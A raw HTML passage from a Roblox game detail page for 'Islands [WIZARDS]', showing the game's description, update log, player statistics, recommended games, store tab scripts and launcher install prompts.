captchaTypes=[{"Type":"Login","PublicKey":"9F35E182-C93C-EBCC-A31D-CF8ED317B996","ApiUrl":"https://captcha.roblox.com/v1/funcaptcha/login/web"}];funCaptcha.addCaptchaTypes(captchaTypes,true);funCaptcha.setMaxRetriesOnTokenValidationFailure(0);funCaptcha.setPerAppTypeLoggingEnabled(false);funCaptcha.setRetryIntervalRange(500,1500);}});function reportFunCaptchaLoaded()
{if(Roblox.BundleDetector)
{Roblox.BundleDetector.reportResourceLoaded("funcaptcha");}}</script><div id=header class="navbar-fixed-top rbx-header light-theme gotham-font" data-isauthenticated=false role=navigation><div class=container-fluid><div class=rbx-navbar-header><div data-behavior=nav-notification class=rbx-nav-collapse onselectstart="return false"></div><div class=navbar-header><a class=navbar-brand href="https://www.roblox.com/"> <span class=icon-logo></span> <span class=icon-logo-r></span> </a></div></div><ul class="nav rbx-navbar hidden-xs hidden-sm col-md-5 col-lg-4"><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/games>Games</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href="https://www.roblox.com/catalog/">Avatar Shop</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/develop>Create</a><li class=cursor-pointer><a class="font-header-2 buy-robux nav-menu-title text-header" href="https://www.roblox.com/upgrades/robux?ctx=nav">Robux</a></ul><div id=navbar-universal-search class="navbar-left rbx-navbar-search col-xs-5 col-sm-6 col-md-2 col-lg-3" data-behavior=univeral-search role=search><div class=input-group><input id=navbar-search-input class="form-control input-field" type=text placeholder=Search maxlength=120 autocomplete=off> <input class=hidden type=text name=preventChromeAutofillForSearchInput><div class=input-group-btn><button id=navbar-search-btn class=input-addon-btn type=submit> <span class=icon-nav-search></span> </button></div></div><ul data-toggle=dropdown-menu class=dropdown-menu role=menu><li class="rbx-navbar-search-option rbx-clickable-li selected" data-searchurl="https://www.roblox.com/games/?Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/games/?Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Games</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/search/users?keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/search/users?keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Players</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/catalog/browse.aspx?CatalogContext=1&amp;Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/catalog/browse.aspx?CatalogContext=1&amp;Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Catalog</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/search/groups?keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/search/groups?keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Groups</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/develop/library?CatalogContext=2&amp;Category=6&amp;Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/develop/library?CatalogContext=2&amp;Category=6&amp;Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Library</span> </a></ul></div><div class="navbar-right rbx-navbar-right"><ul class="nav navbar-right rbx-navbar-right-nav" data-display-opened=False><li class=signup-button-container><a id=sign-up-button class="rbx-navbar-signup nav-menu-title signup-button" href=https://www.roblox.com/account/signupredir>Sign Up</a><li class=login-action><a class="roblox-popover rbx-navbar-login nav-menu-title rbx-menu-item" data-bind=login-dropdown data-container=login-dropdown-container> Log In </a><div id=login-dropdown data-hidden-class-name=invisible class="roblox-popover-content bottom invisible login-dropdown"><div id=login-dropdown-container class="roblox-popover-container login-dropdown-container"><div class=arrow></div><div id=login-container class=login-container><div login-form context=loginDropdown is-facebook-sign-in-enabled=true use-facebook-redirect=true redirect-to-login-page-when-username-is-required=true is-login-fun-captcha-enabled=true is-always-captcha-login-enabled=false is-captcha-v2-component-for-login-enabled=true is-bedev2-captcha-for-web-login-enabled=true></div></div></div></div><li class=rbx-navbar-right-search data-toggle=toggle-search><a class=rbx-menu-icon> <span class=icon-nav-search-white></span> </a></ul></div><ul class="nav rbx-navbar hidden-md hidden-lg col-xs-12"><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/games>Games</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href="https://www.roblox.com/catalog/">Avatar Shop</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/develop>Create</a><li class=cursor-pointer><a class="font-header-2 buy-robux nav-menu-title text-header" href="https://www.roblox.com/upgrades/robux?ctx=nav">Robux</a></ul></div></div><div id=i18nForAmazonShopSwitch data-is-i18n-enabled-for-shop-amazon-dialog=true data-amazon-store-url="https://www.amazon.com/roblox?&amp;_encoding=UTF8&amp;tag=r05d13-20&amp;linkCode=ur2&amp;linkId=4ba2e1ad82f781c8e8cc98329b1066d0&amp;camp=1789&amp;creative=9325" style=display:none></div><script>var Roblox=Roblox||{};(function(){if(Roblox&&Roblox.Performance){Roblox.Performance.setPerformanceMark("navigation_end");}})();</script><div class=container-main id=container-main><script>if(top.location!=self.location){top.location=self.location.href;}</script><div class=alert-container><noscript><div><div class=alert-info role=alert>Please enable Javascript to use all the features on this site.</div></div></noscript></div><div class=content><div id=Leaderboard-Abp class="abp leaderboard-abp"><iframe name=Roblox_GameDetail_Top_728x90 allowtransparency=true frameborder=0 height=110 scrolling=no data-src="" src=https://www.roblox.com/user-sponsorship/1 width=728 data-js-adtype=iframead data-ad-slot=Roblox_GameDetail_Top_728x90></iframe></div><div id=game-detail-page class="row page-content inline-social" data-place-id=4872321990><div class="col-xs-12 section-content game-main-content remove-panel follow-button-enabled"><div class=game-thumb-container><div id=carousel-game-details class="carousel slide" data-ride=carousel data-is-video-autoplayed-on-ready=true data-is-mobile=false><div class=carousel-inner role=listbox><div class="item active"><span><img class=carousel-thumb src=https://t7.rbxcdn.com/fe1eca66203e5a8e934bfe96d52d0af0></span></div><div class=item><span><img class=carousel-thumb src=https://t4.rbxcdn.com/b1feba2653e207698c732f7c244b3e9e></span></div></div><a class="left carousel-control" href=#carousel-game-details role=button data-slide=prev> <span class=icon-carousel-left aria-hidden=true></span> <span class=sr-only>Previous</span> </a> <a class="right carousel-control" href=#carousel-game-details role=button data-slide=next> <span class=icon-carousel-right aria-hidden=true></span> <span class=sr-only>Next</span> </a></div></div><div class=game-calls-to-action><div class=game-title-container><h2 class=game-name title="Islands 🧙‍♂️ [WIZARDS]">Islands &#129497;‍♂️ [WIZARDS]</h2><div class=game-creator><span class=text-label>By</span> <a class=text-name href="https://www.roblox.com/groups/group.aspx?gid=5774246">Easy.gg</a></div></div><div class=game-buttons-container><div class="border-top border-bottom game-play-buttons" data-autoplay=false><div class=game-play-button-container><div id=MultiplayerVisitButton class="VisitButton VisitButtonPlayGLI" placeid=4872321990 data-action=play data-is-membership-level-ok=true data-user-id="" data-universe-id=1659645941 data-originator-type="" data-originator-id=""><a class=btn-common-play-game-lg> <span class=icon-play-game></span> </a></div><script>Roblox=Roblox||{};Roblox.BCUpsellModal=function(){var resources={title:"Builders Club Only",body:"This is a premium item only available to our Builders Club members.",accept:"Upgrade Now",decline:"Cancel"};var open=function(){var options={titleText:resources.title,bodyContent:resources.body,footerText:"",acceptText:resources.accept,declineText:resources.decline,acceptColor:Roblox.GenericConfirmation.green,onAccept:function(){window.location.href="https://www.roblox.com/premium/membership?ctx=bc-only-game"},imageUrl:'https://images.rbxcdn.com/43ac54175f3f3cd403536fedd9170c10.png'};Roblox.GenericConfirmation.open(options);};return{open:open,Resources:resources};}();</script><script>$(function(){Roblox.PlaceItemPurchase=new Roblox.ItemPurchase(function(obj){$(".PurchaseButton[data-item-id="+obj.AssetID+"]").each(function(index,htmlElem){$("#rbx-place-purchase-required").hide();$("#MultiplayerVisitButton").show();});});if("False".toLowerCase()=="true"){$(function(){$("#rbx-place-purchase-required").on("click",function(e){Roblox.PlaceItemPurchase.openPurchaseVerificationView(this);return false;});});}});</script><script>var isUniversalLinkEnabled="False".toLowerCase()=="true";var isUniversalLinkEnabledForIos13="True".toLowerCase()=="true";$(function(){if(Roblox&&Roblox.JsClientDeviceIdentifier&&Roblox.JsClientDeviceIdentifier.isIos13Ipad){if(isUniversalLinkEnabled||isUniversalLinkEnabledForIos13){var assetGameUrl="https://assetgame."+Roblox.EnvironmentUrls.domain;$("#MultiplayerVisitButton a").attr("href",assetGameUrl+"/games/start?id="+4872321990).attr("target","_blank");}else{$("#MultiplayerVisitButton a").attr("href","robloxmobile://placeID="+4872321990).attr("backup-url","https://itunes.apple.com/us/app/roblox-mobile/id431946152");}
$("#MultiplayerVisitButton").removeClass("VisitButtonPlayGLI").addClass("VisitButtonPlay");}});</script></div></div><ul class=favorite-follow-vote-share><li class=game-favorite-button-container><div class=tooltip-container data-toggle=tooltip data-original-title="Add to Favorites"><div class=favorite-button><a id=toggle-game-favorite data-toggle-url=/favorite/toggle data-assetid=4872321990 data-isguest=True data-signin-url="https://www.roblox.com/newlogin?returnUrl=%2Fgames%2F4872321990%2FIslands-WIZARDS%3FrefPageId%3Db4080204-4ca9-40d9-b163-06ab01549241"><div id=game-favorite-icon class=icon-favorite></div><div id=game-favorite-icon-label class=icon-label>Favorite</div></a></div></div><li class=game-follow-button-container><div class=tooltip-container data-toggle=tooltip data-original-title=""><div class=follow-button><a id=toggle-game-follow data-universe-id=1659645941 data-is-guest=true data-signin-url="https://www.roblox.com/newlogin?returnUrl=%2Fgames%2F4872321990%2FIslands-WIZARDS%3FrefPageId%3Db4080204-4ca9-40d9-b163-06ab01549241" data-user-id=0 data-originator="" data-originator-id=""><div id=game-follow-icon class=icon-follow-game></div><div id=game-follow-icon-label class=icon-label>Follow</div></a></div></div><li id=voting-container class=voting-panel><span class="game-voting-panel spinner spinner-default"></span><li class=social-media-share></ul></div></div></div><div class="col-xs-12 rbx-tabs-horizontal" data-place-id=4872321990><ul id=horizontal-tabs class="nav nav-tabs" role=tablist><li id=tab-about class="rbx-tab tab-about active"><a class=rbx-tab-heading href=#about> <span class=text-lead>About</span> </a><li id=tab-store class="rbx-tab tab-store"><a class=rbx-tab-heading href=#store> <span class=text-lead>Store</span> </a><li id=tab-game-instances class="rbx-tab tab-game-instances"><a class=rbx-tab-heading href=#game-instances> <span class=text-lead>Servers</span> </a></ul><div class="tab-content rbx-tab-content"><div class="tab-pane active" id=about><div class="section game-about-container"><div class=container-header><h3>Description</h3></div><div class="section-content remove-panel"><pre class="text game-description linkify">Welcome to Islands!

&#127794; Build your own island
&#128105;‍&#127806; Create huge farms
&#128184; Sell items to make money
&#128104;‍&#127859; Cook tasty delicacies
✨ Forage valuable items
&#128293; And more!

&#129497;‍♂️ Update Log (July 17): 
- Wizard Lizard Mob
- Spellbook
- Mushroom &amp; Mushroom Block
- Foraging Items (acorn &amp; horseradish)
- New flowers (daffodil &amp; crocus)
- Added a tutorial for new players
- Bug fixes</pre><ul class="border-top border-bottom game-stats-container follow-button-enabled"><li class=game-stat><p class="text-label text-overflow font-caption-header">Playing<p class="text-lead font-caption-body wait-for-i18n-format-render">69,955<li class=game-stat><p class="text-label text-overflow font-caption-header">Favorites<p class="text-lead font-caption-body wait-for-i18n-format-render"><span class=game-favorite-count>1,111,609</span><li class=game-stat><p class="text-label text-overflow font-caption-header">Visits<p id=game-visit-count class="text-lead font-caption-body wait-for-i18n-format-render" title=265,082,346>265.0M+<li class=game-stat><p class="text-label text-overflow font-caption-header">Created<p class="text-lead font-caption-body">4/8/2020<li class=game-stat><p class="text-label text-overflow font-caption-header">Updated<p class="text-lead font-caption-body">7/17/2020<li class=game-stat><p class="text-label text-overflow font-caption-header">Max Players<p class="text-lead font-caption-body wait-for-i18n-format-render">20<li class=game-stat><p class="text-label text-overflow font-caption-header">Genre<p class=text-lead><a class="text-name font-caption-body wait-for-i18n-format-render" href="https://www.roblox.com/games?GenreFilter=1">All Genres</a><li class=game-stat><p class="text-label text-overflow font-caption-header">Allowed Gear<p class="text-lead font-caption-body stat-gears"><span class=icon-nogear data-toggle=tooltip data-original-title="No Gear Allowed"></span></ul><div class=game-stat-footer><span class=game-report-abuse><a class="text-report abuse-report-modal" href="https://www.roblox.com/abusereport/asset?id=4872321990&amp;RedirectUrl=%2fgames%2f4872321990%2fIslands-WIZARDS">Report Abuse</a></span></div></div></div><div id=rbx-vip-servers class=stack data-placeid=4872321990 data-universeid=1659645941 data-place-name="Islands &amp;#129497;&amp;#8205;&amp;#9794;&amp;#65039; [WIZARDS]" data-creator-name=Easy.gg data-renew-price="This VIP Server will start renewing every month at &lt;span class='text-robux text-free'>Free&lt;/span> until you cancel." data-user-profile-absolute-url=https://www.roblox.com/users/0/profile data-showshutdown data-slow-game-fps-threshold=15 data-private-server-name-max-length=50 data-private-server-name-error-text="The name of a Private Server cannot be blank and can be no more than {0} characters." data-configure-base-url="/private-server/configure?privateServerId={0}" data-game-instances-base-url="/private-server/instance-list?universeId=1659645941" data-game-shutdown-url=/game-instances/shutdown data-is-user-authenticated=False data-instance-list-url=/private-server/instance-list-json data-renew-url=/private-server/renew data-is-game-joinable=False data-is-create-vip-server-preopened=False data-is-create-vip-server-jq-disabled=False><div class=container-header><h3>Private Servers</h3><span class=tooltip-container data-toggle=tooltip data-original-title="Private servers let you play this game privately with friends or people you invite!"> <span class=icon-moreinfo></span> </span></div><div class="create-server-banner section-content remove-panel"><div class="create-server-banner-text text"><span class=play-with-others-text>Play this game with friends and other people you invite.<br>See all your private servers in the <a class=text-link href=#!/game-instances>Servers</a> tab.</span></div></div><div class="section tab-server-only"></div></div><div id=game-badges-container><game-badges-list universe-id=1659645941></game-badges-list></div><script>var Roblox=Roblox||{};Roblox.GameDetail=Roblox.GameDetail||{};Roblox.GameDetail.UniverseId=1659645941;</script><div id=my-recommended-games class="container-list games-detail"><div class=container-header><h3>Recommended Games</h3></div><ul class="hlist game-cards"><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=4522347649&amp;Position=1&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t6.rbxcdn.com/6ed4aa792044429392614604d62e8c5c alt="[FREE ADMIN]" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t6.rbxcdn.com/6ed4aa792044429392614604d62e8c5c&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="[FREE ADMIN]" ng-non-bindable>[FREE ADMIN]</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">65%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=10562>10.6K</span></div></a></div><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=2377868063&amp;Position=2&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t0.rbxcdn.com/4fc075306045b8d38ecd862e4af30439 alt="Strucid [BETA]" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t0.rbxcdn.com/4fc075306045b8d38ecd862e4af30439&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="Strucid [BETA]" ng-non-bindable>Strucid [BETA]</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">84%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=8198>8.2K</span></div></a></div><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=654732683&amp;Position=3&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t0.rbxcdn.com/35fc4d43558efacc23d703563aa44a81 alt="[4 New Cars ☀️] Car Crushers 2" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t0.rbxcdn.com/35fc4d43558efacc23d703563aa44a81&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="[4 New Cars ☀️] Car Crushers 2" ng-non-bindable>[4 New Cars ☀️] Car Crushers 2</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">91%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=7101>7.1K</span></div></a></div><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=893973440&amp;Position=4&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t5.rbxcdn.com/0d2aeab3f926d061c0ba074f5c29c139 alt="Flee the Facility [Beta]" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t5.rbxcdn.com/0d2aeab3f926d061c0ba074f5c29c139&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="Flee the Facility [Beta]" ng-non-bindable>Flee the Facility [Beta]</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">92%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=27508>27.5K</span></div></a></div><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=273735085&amp;Position=5&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t6.rbxcdn.com/25c780e8b36895b1ba93f9ba115ee632 alt="UPDATES SOON -RooM ★ | V2.03.9 Alpha" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t6.rbxcdn.com/25c780e8b36895b1ba93f9ba115ee632&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="UPDATES SOON -RooM ★ | V2.03.9 Alpha" ng-non-bindable>UPDATES SOON -RooM ★ | V2.03.9 Alpha</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">92%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=541>541</span></div></a></div><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?RecommendationAlgorithm=1&amp;RecommendationSourceId=4872321990&amp;PlaceId=5082331079&amp;Position=6&amp;SortPosition=1&amp;PageId=8ef78589-b34a-472e-9bc3-8569b3a9d27e&amp;PageType=GameDetail" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb src=https://t5.rbxcdn.com/ce2ec280d6cfcab46dfc2e4af29c4806 alt="[CARTOON CAT] Cult Of The Cryptids" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t5.rbxcdn.com/ce2ec280d6cfcab46dfc2e4af29c4806&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="[CARTOON CAT] Cult Of The Cryptids" ng-non-bindable>[CARTOON CAT] Cult Of The Cryptids</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label">85%</span> <span class="info-label no-vote hidden"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=4641>4.6K</span></div></a></div></ul></div></div><div class="tab-pane store" id=store><div id=rbx-game-passes class="container-list game-dev-store game-passes"><div class=container-header><h3>Passes</h3></div><ul id=rbx-passes-container class="hlist store-cards gear-passes-container"></ul></div><li class="list-item rbx-passes-item-container rbx-gear-passes-item-add" id=spinner style=display:none><span class="spinner spinner-default"></span></li><script>$(function(){Roblox.GamePassJSData=Roblox.GamePassJSData||{};Roblox.GamePassJSData.PlaceID=4872321990;Roblox.GamePassJSData.GamePassesPerPlaceLimit=50;Roblox.GamePassJSData.LabelBuy="Buy";Roblox.GamePassJSData.LabelOwned="Owned";Roblox.GamePassJSData.DataAssetType="Game Pass";var purchaseConfirmationCallback=function(obj){var originalContainer=$('.PurchaseButton[data-item-id='+obj.AssetID+']').parent('.store-card-caption');originalContainer.find('.rbx-purchased').hide();originalContainer.find('.rbx-item-buy').show();};Roblox.GamePassItemPurchase=new Roblox.ItemPurchase(purchaseConfirmationCallback);$("#store #rbx-game-passes, #all-purchasable-items #rbx-game-passes").on("click",".PurchaseButton",function(e){Roblox.PlaceProductPromotionItemPurchase.openPurchaseVerificationView($(this),'game-pass');});$("#store #rbx-game-passes .btn-more, #all-purchasable-items #rbx-game-passes .btn-more").on("click",function(e){$("#rbx-game-passes #rbx-passes-container").toggleClass("collapsed");});});</script><input name=__RequestVerificationToken type=hidden value=p5_KNJc093PfMQHVsdzP05Id6IU125YdTOWlf4JznmvEBElOLC5ojtaQAuXX2huFmpzSSe6tPEBzRi_lbdk8vW14X5A1><div id=rbx-game-gear class="container-list game-dev-store game-gear"><div class=container-header><h3>Gear for this game</h3></div><ul id=rbx-gear-container class="hlist store-cards gear-passes-container rbx-gear-container"></ul></div><script>$(function(){Roblox=Roblox||{};Roblox.PromotedProductJSData=Roblox.PromotedProductJSData||{};Roblox.PlaceProductPromotion.Resources={anErrorOccurred:"An error occurred, please try again.",ok:"OK",success:"Success!",error:"Error",sorryWeCouldnt:"Sorry, we couldn&#39;t remove the item from your game. Please try again.",notForSale:"This item is not for sale.",rent:"Rent"};var purchaseConfirmationCallback=function(obj){var originalContainer=$('.PurchaseButton[data-item-id='+obj.AssetID+']').parent('.store-card-caption');originalContainer.find('.rbx-purchased').hide();originalContainer.find('.rbx-item-buy').show();};Roblox.PlaceProductPromotionItemPurchase=new Roblox.ItemPurchase(purchaseConfirmationCallback);Roblox.PromotedProductJSData.PlaceID=4872321990;$("#store, #all-purchasable-items").on("click",".icon-alert",function(e){var promoId=$(this).data('delete-promotion-id');Roblox.PlaceProductPromotion.DeleteGear(promoId);});$("#store #rbx-game-gear, #all-purchasable-items #rbx-game-gear").on("click",".PurchaseButton",function(e){Roblox.PlaceProductPromotionItemPurchase.openPurchaseVerificationView($(this),'game-gear');});$("#store #rbx-game-gear .btn-more, #all-purchasable-items #rbx-game-gear .btn-more").on("click",function(e){$("#rbx-game-gear .rbx-gear-container").toggleClass("collapsed");});$(".rbx-tab a[href='#store']").on('shown.bs.tab',function(){Roblox.PlaceProductPromotionLazy.init();Roblox.GamePassLazyLoading.init();$(".rbx-tab a[href='#store']").unbind('shown.bs.tab');});var checkForImmediateLoading=function(){var loadImmediatelyData=$("#all-purchasable-items").data('load-immediately');if(parseInt(loadImmediatelyData)>0){Roblox.PlaceProductPromotionLazy.init();Roblox.GamePassLazyLoading.init();}}
checkForImmediateLoading();});</script><div id=DeleteProductPromotionModal class=PurchaseModal><div id=simplemodal-close class=simplemodal-close><a></a></div><div class=titleBar style=text-align:center></div><div class=PurchaseModalBody><div class=PurchaseModalMessage><div class=PurchaseModalMessageImage><div class=thumbs-up-green></div></div><div class=PurchaseModalMessageText></div></div><div class=PurchaseModalButtonContainer><div class="ImageButton btn-blue-ok-sharp simplemodal-close"></div></div><div class=PurchaseModalFooter></div></div></div></div><div class="tab-pane game-instances" id=game-instances><div class="col-xs-12 section-content-off">There are currently no running games.</div></div></div></div></div><div class="GenericModal modalPopup unifiedModal smallModal" style=display:none><div class=Title></div><div class=GenericModalBody><div><div class=ImageContainer><img class=GenericModalImage alt="generic image"></div><div class=Message></div></div><div class=clear></div><div id=GenericModalButtonContainer class=GenericModalButtonContainer><a class="ImageButton btn-neutral btn-large roblox-ok">OK</a></div></div></div><div id=ItemPurchaseAjaxData data-has-currency-service-error=False data-currency-service-error-message="" data-authenticateduser-isnull=True data-user-balance-robux=0 data-user-bc=0 data-continueshopping-url="https://www.roblox.com/games/4872321990/Islands-WIZARDS?refPageId=b4080204-4ca9-40d9-b163-06ab01549241" data-imageurl=https://t4.rbxcdn.com/003444158647fc0f4238e793416a65a3 data-alerturl=https://images.rbxcdn.com/75af9e2cb6a75450bee5245f5ee11c86.svg.gzip data-insufficentfundsurl=https://images.rbxcdn.com/b80339ddf867ccfe6ab23a2c263d8000.png data-is-bc-only-requirement-enabled=False data-is-plugins-purchasing-enabled=True></div><script>var Roblox=Roblox||{};Roblox.GamePassJSData=Roblox.GamePassJSData||{};Roblox.GamePassJSData.LabelGameDoesNotSell="No virtual items or power-ups available.";$(function(){if(Roblox.Voting){Roblox.Voting.LoadVotingService($("#voting-container"),4872321990);}});Roblox.GamePassJSData.TotalGearItems=0;</script><div id=Skyscraper-Abp-Right class="abp abp-container right-abp"><iframe name=Roblox_GameDetail_Right_160x600 allowtransparency=true frameborder=0 height=612 scrolling=no data-src="" src=https://www.roblox.com/user-sponsorship/2 width=160 data-js-adtype=iframead data-ad-slot=Roblox_GameDetail_Right_160x600></iframe></div></div></div><footer class=container-footer id=footer-container></footer></div><script>function urchinTracker(){}</script><script>if(typeof Roblox==="undefined"){Roblox={};}
if(typeof Roblox.PlaceLauncher==="undefined"){Roblox.PlaceLauncher={};}
var isRobloxIconEnabledForRetheme="True";var robloxIcon=isRobloxIconEnabledForRetheme==='True'?"<span class='icon-logo-r-95'></span>":"<img src='https://images.rbxcdn.com/6304dfebadecbb3b338a79a6a528936c.svg.gzip' width='90' height='90' alt='R'/>";Roblox.PlaceLauncher.Resources={RefactorEnabled:"True",IsProtocolHandlerBaseUrlParamEnabled:"False",ProtocolHandlerAreYouInstalled:{play:{content:robloxIcon+"<p>You&#39;re moments away from getting into the game!</p>",buttonText:"Download and Install Roblox",footerContent:"<a href='https://assetgame.roblox.com/game/help'class= 'text-name small' target='_blank' >Click here for help</a> "},studio:{content:"<img src='https://images.rbxcdn.com/3da410727fa2670dcb4f31316643138a.svg.gzip' width='95' height='95' alt='R' /><p>Get started creating your own games!</p>",buttonText:"Download Studio"}},ProtocolHandlerStartingDialog:{play:{content:robloxIcon+"<p>Roblox is now loading. Get ready to play!</p>"},studio:{content:"<img src='https://images.rbxcdn.com/3da410727fa2670dcb4f31316643138a.svg.gzip' width='95' height='95' alt='R' /><p>Checking for Roblox Studio...</p>"},loader:"<span class='spinner spinner-default'></span>"}};</script><div id=PlaceLauncherStatusPanel style=display:none;width:300px data-new-plugin-events-enabled=True data-event-stream-for-plugin-enabled=True data-event-stream-for-protocol-enabled=True data-is-game-launch-interface-enabled=True data-is-protocol-handler-launch-enabled=True data-is-user-logged-in=False data-os-name=Windows data-protocol-name-for-client=roblox-player data-protocol-name-for-studio=roblox-studio data-protocol-roblox-locale=en_us data-protocol-game-locale=en_us data-protocol-url-includes-launchtime=true data-protocol-detection-enabled=true data-protocol-separate-script-parameters-enabled=true data-protocol-avatar-parameter-enabled=false><div class="modalPopup blueAndWhite PlaceLauncherModal" style=min-height:160px><div id=Spinner class=Spinner style="padding:20px 0"><img data-delaysrc=https://images.rbxcdn.com/e998fb4c03e8c2e30792f2f3436e9416.gif height=32 width=32 alt=Progress></div><div id=status style="min-height:40px;text-align:center;margin:5px 20px"><div id=Starting class="PlaceLauncherStatus MadStatusStarting" style=display:block>Starting Roblox...</div><div id=Waiting class="PlaceLauncherStatus MadStatusField">Connecting to Players...</div><div id=StatusBackBuffer class="PlaceLauncherStatus PlaceLauncherStatusBackBuffer MadStatusBackBuffer"></div></div><div style=text-align:center;margin-top:1em><input type=button class="Button CancelPlaceLauncherButton translate" value=Cancel></div></div></div><div id=ProtocolHandlerClickAlwaysAllowed class=ph-clickalwaysallowed style=display:none><p class=larger-font-size><span class=icon-moreinfo></span> Check <strong>Always open links for URL: Roblox Protocol</strong> and click <strong>Open URL: Roblox Protocol</strong> in the dialog box above to join games faster in the future!</div><script>function checkRobloxInstall(){return RobloxLaunch.CheckRobloxInstall('https://www.roblox.com/Download');}</script><div id=InstallationInstructions style=display:none><div class=ph-installinstructions><div class=ph-modal-header><span class="icon-close simplemodal-close"></span><h3 class=title>Thanks for playing Roblox</h3></div><div class=modal-content-container><div class=ph-installinstructions-body><ul class=modal-col-4><li class=step1-of-4><h2>1</h2><p class=larger-font-size>Click <strong>RobloxPlayer.exe</strong> to run the Roblox installer, which just downloaded via your web browser.</p><img 